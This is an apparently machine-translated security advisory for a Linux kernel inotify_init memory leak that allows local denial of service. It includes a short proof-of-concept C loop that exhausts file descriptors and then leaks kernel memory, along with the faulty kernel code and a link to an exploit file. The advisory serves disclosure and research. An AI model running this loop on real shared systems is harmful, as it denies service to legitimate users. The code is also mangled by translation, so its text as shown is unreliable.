Linux Kernel inotify_init () Memory leakage Local Denial of Service Vulnerability
Release date:
Updated on:
Affected Systems:
Linux kernel 2.6.24.3-2.6.37
Description:
--------------------------------------------------------------------------------
Bugtraq id: 45036
Linux Kernel is the Kernel used by open source Linux.
Linux Kernel implementation has a vulnerability. Local attackers can exploit this vulnerability to cause memory depletion and cause denial of service to legitimate users.
When file descriptors cannot be created, Inotify does not properly perform the cleanup operation, resulting in kernel memory leakage.
You can pay attention to "slabtop" when running the following program ":
# Include <sys/inotify. h>
# Include <unistd. h>
Int main (int argc, char * argv [])
{
Int fds [2];
/* Circumvent max inotify instances limit */
While (pipe (fds )! =-1)
;
While (1)
Inotify_init ();
Return 0;
}
The problem lies in inotify_init1 at the leak of the Group indicator:
Group = inotify_new_group (user, inotify_max_queued_events );
[...]
Ret = anon_inode_getfd ("inotify", & inotify_fops, group,
O_RDONLY | flags );
If (ret> = 0)
Return ret;
Atomic_dec (& user-> inotify_devs );
Out_free_uid:
Free_uid (user );
Return ret;
<* Source: Vegard Nossum
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Vegard Nossum provides the following test methods:
Http://www.securityfocus.com/data/vulnerabilities/exploits/45036.c
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Linux
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.kernel.org/